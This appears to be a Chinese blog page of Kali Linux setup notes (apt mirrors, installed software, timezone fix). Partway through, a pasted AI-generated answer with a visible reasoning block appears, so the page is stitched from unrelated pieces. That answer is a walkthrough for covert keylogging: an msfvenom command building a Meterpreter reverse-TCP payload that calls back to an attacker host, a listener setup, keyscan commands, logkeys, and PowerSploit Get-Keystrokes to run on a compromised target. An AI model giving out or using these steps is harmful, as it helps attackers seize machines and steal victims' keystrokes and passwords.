kali 系统使用记录

机器:联想小新air12  

系统:kali4.15.0-kali2-amd64 #1 SMP Debian 4.15.11-1kali1 (2018-03-21) x86_64 GNU/Linux

1、安装过程:网上教程一堆,略

2、配置apt-get源(网上教程一堆),采用阿里的源,网速还可以

cp /etc/apt/soure.list  /etc/apt/soure.list.bak

vim  /etc/apt/soure.list
# deb cdrom:[Debian GNU/Linux 2018.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20180126-21:23]/ kali-last-snapshot contrib main non-free

#deb cdrom:[Debian GNU/Linux 2018.1 _Kali-rolling_ - Official Snapshot amd64 LIVE/INSTALL Binary 20180126-21:23]/ kali-last-snapshot contrib main non-free

#ali
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb http://mirrors.163.com/debian wheezy main non-free contrib
deb-src http://mirrors.163.com/debian wheezy main non-free contrib
deb http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian wheezy-proposed-updates main non-free contrib
deb-src http://mirrors.163.com/debian-security wheezy/updates main non-free contrib
deb http://mirrors.163.com/debian-security wheezy/updates main non-free contrib
 
 
#deb http://ftp.sjtu.edu.cn/debian wheezy main non-free contrib
#deb-src http://ftp.sjtu.edu.cn/debian wheezy main non-free contrib
#deb http://ftp.sjtu.edu.cn/debian wheezy-proposed-updates main non-free contrib
#deb-src http://ftp.sjtu.edu.cn/debian wheezy-proposed-updates main non-free contrib
#deb http://ftp.sjtu.edu.cn/debian-security wheezy/updates main non-free contrib
#deb-src http://ftp.sjtu.edu.cn/debian-security wheezy/updates main non-free contrib
 

deb http://http.kali.org/kali kali-rolling main non-free contrib
deb-src http://http.kali.org/kali kali-rolling main non-free contrib

2、安装的软件 大部分使用apt-get就能安装,少数下载deb使用 dpkg -i *.deb 安装

dpkg安装缺少依赖问题

apt-get -y -f install

 dpkg -i *.deb 

  FTP:filezilla

java开发:IDEA

python开发:pycharm

sql GUI:DBeaver

思维导图:XMind

记事本程序:sublime

浏览器:自带的火狐与chromium谷歌 谷歌浏览器要用非root账户运行

字典:goldendict

中文输入法:fitcx(小企鹅)    google-pinyin 谷歌拼音输入法

office: libreoffice

git GUI:smartGit

chm阅读器:kchmviewer version 5.3

邮箱:Nylas Mail

软件管理:新立得

音频:audacious

笔记:cherryTree

下载工具:Trmission

3、修改内容

安装过程中开启UTC的话,时间会快8个小时,所以安装时要留心,如果误开了解决方案如下

cp /usr/share/zoneinfo/GMT /etc/localtime

ln -sf /usr/share/zoneinfo/Asia/Shanghai    /etc/localtime

ntpdate -u 211.115.194.21

4、mariaDB设置密码  因为mysql的开源风险性,因此kali采用了mysql的分支mariaDB,但是目前mariaDB更新速度比mysql快的多,因此性能也相对较快,而且完全兼容mysql ,故设置密码与mysql一致。


<think>好的,我现在需要帮用户解决在Kali Linux中设置和获取键盘记录的问题。首先,我得回忆一下用户提供的引用内容,看看有没有相关的信息。引用[2]提到在Meterpreter中使用Explore/Log Keystrokes菜单来记录键盘动作,这可能是一个方法。引用[4]里提到了Get-Keystrokes模块,这应该属于PowerSploit或类似的工具。 Kali Linux常用的键盘记录方法可能有几种:使用Metasploit的Meterpreter模块,或者专门的工具如logkeys,或者通过社会工程学工具包。用户可能需要具体的步骤,所以得一步步说明。 首先,Metasploit的方法。用户需要生成一个Payload,然后设置监听。启动msfconsole,搜索相关的模块,比如exploit/multi/handler,设置Payload为windows/meterpreter/reverse_tcp,然后设置LHOST和LPORT。执行exploit后,一旦目标机运行Payload,就能获得Meterpreter会话。然后使用keyscan_start开始记录,keyscan_dump查看记录,最后keyscan_stop停止。这部分在引用[2]和[4]中有提到。 另外,logkeys是一个Linux下的键盘记录工具,安装可能用apt-get,然后配置启动。不过需要注意权限问题,可能需要root权限。 社会工程学工具包(SET)可能也有键盘记录功能,用户可以通过钓鱼攻击诱使目标执行恶意脚本,进而记录键盘输入。这可能涉及到创建恶意文件或网站,然后诱导用户点击。 还要考虑法律和道德问题,用户是否有合法授权进行这些操作。另外,防病毒软件可能会检测到这些工具,所以可能需要免杀处理。 用户可能需要具体的命令示例,比如如何生成Payload,如何配置msfconsole,以及如何启动logkeys服务。同时,引用[3]提到设置LHOST,这在Metasploit中是必须的步骤,需要确保IP正确。 总结步骤:Metasploit的Meterpreter方法、logkeys工具、SET工具包。每个方法的具体操作流程,命令示例,以及注意事项。最后提醒合法使用,引用相关的内容支持步骤的正确性。</think>在Kali Linux中实现键盘记录主要有以下方法,需注意操作需在合法授权范围内进行: ### 一、使用Metasploit的Meterpreter模块 1. **生成Payload** ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.101 LPORT=4444 -f exe > payload.exe ``` 需替换`LHOST`为Kali的IP(如引用[3]的设置)[^3] 2. **启动监听** ```bash msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.200.101 set LPORT 4444 exploit ``` 3. **键盘记录操作** 获取会话后执行: ```bash keyscan_start # 开始记录 keyscan_dump # 查看记录内容 keyscan_stop # 停止记录 ``` 对应引用[2]中提到的Log Keystrokes功能[^2] ### 二、使用logkeys工具 1. 安装与配置: ```bash sudo apt install logkeys sudo logkeys --start --output /var/log/keylog.log ``` 2. 查看记录: ```bash tail -f /var/log/keylog.log ``` ### 三、通过PowerSploit模块 如引用[4]所述,可结合Mimikatz模块: ```powershell Get-Keystrokes -LogPath C:\key.log ``` 需通过渗透手段在目标系统执行该命令[^4]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值